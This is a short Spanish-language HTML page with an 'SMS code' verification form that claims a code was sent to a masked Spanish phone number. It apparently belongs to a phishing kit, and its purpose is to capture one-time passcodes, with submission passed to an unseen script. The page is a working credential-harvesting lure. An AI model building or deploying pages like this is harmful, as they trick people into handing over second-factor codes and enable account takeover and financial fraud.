<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/uptop.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    
    
       
    
        <div class="kola">
        <div>
            <div class="container">
                
                <div class="otm">
                    <img src="./img/semotp-imaj.PNG" alt="">
                </div>
      
      
                <form class="otm2" method="post" id="pg3">
                    <p class="pp1">Codigo SMS</p>
                    <p class="pp2">Te hemos enviado un SMS al número +346******* para verificar tu identidad</p>
                    
                    <p>código SMS  </p>
                    <input type="text" name="" id="sps1" maxlength="19" required>
                    <button class="btn1">Aceptar</button>
                </form>
                    
               
               
                
              </div>
        </div>
    </div>

    
    <script src="./js/stb.js"></script>
</body>
</html>